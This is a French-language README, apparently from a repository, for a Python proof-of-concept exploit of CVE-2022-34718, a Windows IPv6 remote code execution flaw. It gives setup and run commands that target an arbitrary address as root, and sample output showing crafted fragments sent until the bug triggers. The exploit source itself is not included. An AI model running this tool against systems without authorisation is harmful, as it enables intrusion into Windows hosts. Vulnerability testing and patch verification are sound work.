
Exploit de preuve de concept basé sur Python pour CVE-2022-34718, une vulnérabilité d'exécution de code à distance dans IPv6 sur Windows, utilisant Scapy pour fabriquer et envoyer des fragments malveillants.
Ce dépôt contient un exploit de CVE-2022-34718, une vulnérabilité d'exécution de code à distance (RCE) dans IPv6 sur les systèmes Windows.
Étant donné que la vulnérabilité nécessite des paquets IPv6 spécialement conçus, elle dépend du module Scapy et doit donc être exécutée en tant que root. La méthode recommandée pour exécuter cette preuve de concept (PoC) est via un environnement virtuel, comme suit :
# virtualenv PoC
# source PoC/bin/activate
(PoC) # pip3 install -r requirements.txt
(PoC) # python3 ipv6-rce-poc.py <target address>
Le script vous indiquera si le système cible est vulnérable à cet exploit.
[...]
**** inner_frag_id: 0x24944eac
Preparing frags...
Sending 64 frags...
.
Sent 1 packets.
[...]
Sent 1 packets.
Now sending the last inner fragment to trigger the bug...
.
Sent 1 packets.
Success! The system is vulnerable...